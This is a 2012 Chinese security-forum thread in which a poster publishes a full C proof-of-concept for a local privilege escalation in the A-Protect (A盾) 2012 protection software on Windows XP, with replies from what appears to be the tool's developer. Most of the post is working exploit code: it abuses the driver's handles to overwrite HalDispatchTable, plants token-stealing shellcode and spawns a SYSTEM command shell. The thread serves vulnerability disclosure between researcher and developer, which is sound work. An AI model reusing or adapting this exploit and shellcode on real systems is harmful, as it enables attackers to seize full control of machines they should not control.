首页
论坛
课程
招聘
[原创]A盾电脑防护 LE 2012-0.3.1 的一个XXX (还是本地提权)
2012-6-19 15:56 4017

[原创]A盾电脑防护 LE 2012-0.3.1 的一个XXX (还是本地提权)

2012-6-19 15:56
4017
环境:Windows XP SP3 虚拟机

1.打开A-Protect.exe
2.等待A-Protect.exe显示完系统进程信息
3.编译如下代码,双击运行后结束A-Protect.exe,然后得到一个SYSTEM的CMD

#include <Windows.h>

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;
	UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

ULONG  WriteToHalDispatchTable, ZwOpenProcess, ZwOpenProcessTokenEx, ZwDuplicateToken, ZwSetInformationProcess;
ULONG  SYSTEMCID[2]={4,0}, ObjectAttributes[6];
HANDLE  hSystemProc, hTokenHandle, hNewTokenHandle;

void _declspec(naked) ShellCode()
{
	__asm
	{
			pushad
			pushfd

			push offset SYSTEMCID
			push offset ObjectAttributes
			push 0x0400
			push offset hSystemProc
			call ZwOpenProcess
			cmp eax,0
			jnz exit0

			push offset hTokenHandle
			push 0x200
			push TOKEN_ALL_ACCESS
			push hSystemProc;
			call ZwOpenProcessTokenEx
			cmp eax,0
			jnz exit0

			push offset hNewTokenHandle
			push TokenPrimary
			push 0
			push 0
			push TOKEN_ALL_ACCESS
			push hTokenHandle
			call ZwDuplicateToken
			cmp eax,0
			jnz exit0

			push 8
			push offset hNewTokenHandle
			push 9
			push 0xFFFFFFFF
			call ZwSetInformationProcess
exit0:
			popfd
			popad

			ret
	}
}

#define	AProcess_Size 0x683800
WCHAR	pSelfEXEPath[MAX_PATH];
UCHAR	pBuffer[AProcess_Size];
char	pSafe[] = "Safe";

int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{

	HMODULE	ntdll;
	ntdll	=	GetModuleHandle( L"ntdll.dll" );

	if (  _stricmp(GetCommandLineA(),"Son") == 0 )
	{
		HMODULE  ntdll        =  GetModuleHandle( L"ntdll.dll" );
		NtQueryIntervalProfile    =  (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
		NtAllocateVirtualMemory    =  (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
		NtQuerySystemInformation  =  ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
		if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
			return 0;

		//取ntoskrnl的信息,只要调用一次就行
		ULONG  status, NtoskrnlBase;
		RTL_PROCESS_MODULES  module;
		status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
		if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
			return 0;

		NtoskrnlBase     =  (ULONG)module.Modules[0].ImageBase;

		//把ntoskrnl.exe加载进来
		HMODULE    ntoskrnl;
		ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
		if ( ntoskrnl == NULL )
			return 0;

		//计算实际地址
		WriteToHalDispatchTable    =  (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4; //需要覆盖的地址
		ZwOpenProcess        =  (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
		ZwOpenProcessTokenEx    =  (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcessTokenEx") - (ULONG)ntoskrnl + NtoskrnlBase;
		ZwDuplicateToken      =  (ULONG)GetProcAddress(ntoskrnl,"ZwDuplicateToken") - (ULONG)ntoskrnl + NtoskrnlBase;
		ZwSetInformationProcess    =  (ULONG)GetProcAddress(ntoskrnl,"ZwSetInformationProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

		//以下代码就各显神通了
		ReadFile((HANDLE)0x18881111,pSafe,8,NULL,NULL);

		LPVOID MyAddress = VirtualAlloc(NULL,0x1000,MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
		if (MyAddress==NULL)
			return 0;
		memset(MyAddress,0,0x1000);

		ULONG Length[7]={0};
		Length[0]=-1;
		Length[6]=(ULONG)MyAddress;
		Length[7]=WriteToHalDispatchTable;
		ReadFile((HANDLE)0x18881191,0,(ULONG)Length,NULL,NULL);

		memcpy( MyAddress, ShellCode, 200 );

		//触发,弹出SYSTEM的CMD
		NtQueryIntervalProfile( 2, &status );

		STARTUPINFO si;
		PROCESS_INFORMATION pii;

		ZeroMemory( &si, sizeof(si) );
		si.cb = sizeof(si);
		ZeroMemory( &pii, sizeof(pii) );

		CreateProcess( L"C:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
	}
	else
	{
		HWND hWnd;

		hWnd = FindWindow(NULL,L"A盾电脑防护 LE 2012-0.3.1");
		if ( hWnd == NULL )
			return 0;
		PostMessage(hWnd,WM_CLOSE,0,0);

		for ( int i = 0; i < 10; i++ )
		{
			Sleep(1000);

			hWnd = FindWindow(NULL,L"A盾电脑防护");
			if ( hWnd != NULL )
			{
				PostMessage(hWnd,WM_KEYDOWN,VK_RETURN,0);
				break;
			}
		}

		GetModuleFileName(NULL,pSelfEXEPath,MAX_PATH);

		HANDLE hSelfFile = CreateFile(pSelfEXEPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		if ( hSelfFile == INVALID_HANDLE_VALUE )
			return 0;

		ULONG uFileSize = GetFileSize(hSelfFile,NULL);
		if ( uFileSize == INVALID_FILE_SIZE )
			return 0;

		ULONG dwResult;
		if ( ReadFile(hSelfFile,pBuffer,uFileSize,&dwResult,NULL) == 0 )
			return 0;

		HANDLE hTargetFile = CreateFile( L"C:\\1.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
		if (hTargetFile == INVALID_HANDLE_VALUE)
			return 0;

		if(!WriteFile (hTargetFile, pBuffer, AProcess_Size, &dwResult, NULL))
			return 0;

		CloseHandle(hSelfFile);

		CloseHandle(hTargetFile);


		STARTUPINFO si;
		PROCESS_INFORMATION pii;

		ZeroMemory( &si, sizeof(si) );
		si.cb = sizeof(si);
		ZeroMemory( &pii, sizeof(pii) );

		CreateProcess( L"C:\\1.exe", L"Son", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
	}
	return 0;
}


不玩了,学习A盾开源的代码去了。

[注意] 欢迎加入看雪团队!base上海,招聘CTF安全工程师,将兴趣和工作融合在一起!看雪20年安全圈的口碑,助你快速成长!

收藏
点赞0
打赏
分享
最新回复 (4)
雪    币: 728
活跃值: 活跃值 (76)
能力值: ( LV9,RANK:380 )
在线值:
发帖
回帖
粉丝
Winker 活跃值 8 2012-6-19 19:42
2
0
哈哈,我就知道你会用这招:

HANDLE hSelfFile = CreateFile(pSelfEXEPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if ( hSelfFile == INVALID_HANDLE_VALUE )
      return 0;

    ULONG uFileSize = GetFileSize(hSelfFile,NULL);
    if ( uFileSize == INVALID_FILE_SIZE )
      return 0;

    ULONG dwResult;
    if ( ReadFile(hSelfFile,pBuffer,uFileSize,&dwResult,NULL) == 0 )
      return 0;

    HANDLE hTargetFile = CreateFile( L"C:\\1.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hTargetFile == INVALID_HANDLE_VALUE)
      return 0;

    if(!WriteFile (hTargetFile, pBuffer, AProcess_Size, &dwResult, NULL))
      return 0;

看来我这样做限制还是不行~~看来要验证MD5才行了。
雪    币: 728
活跃值: 活跃值 (76)
能力值: ( LV9,RANK:380 )
在线值:
发帖
回帖
粉丝
Winker 活跃值 8 2012-6-19 19:52
3
0
话说这样应该不是严格意义上的本地提权吧,因为只要A盾还在运行着,是不会产生这个bug~
雪    币: 463
活跃值: 活跃值 (20)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
KiDebug 活跃值 4 2012-6-19 20:12
4
0
呃。。乱用提权字眼了。

验MD5也不管用啊

以后修改的代码还会继续开源么?
雪    币: 728
活跃值: 活跃值 (76)
能力值: ( LV9,RANK:380 )
在线值:
发帖
回帖
粉丝
Winker 活跃值 8 2012-6-20 09:17
5
0
  看情况了。如果觉得发布的意义大于留在硬盘的意义,就发布。
游客
登录 | 注册 方可回帖
返回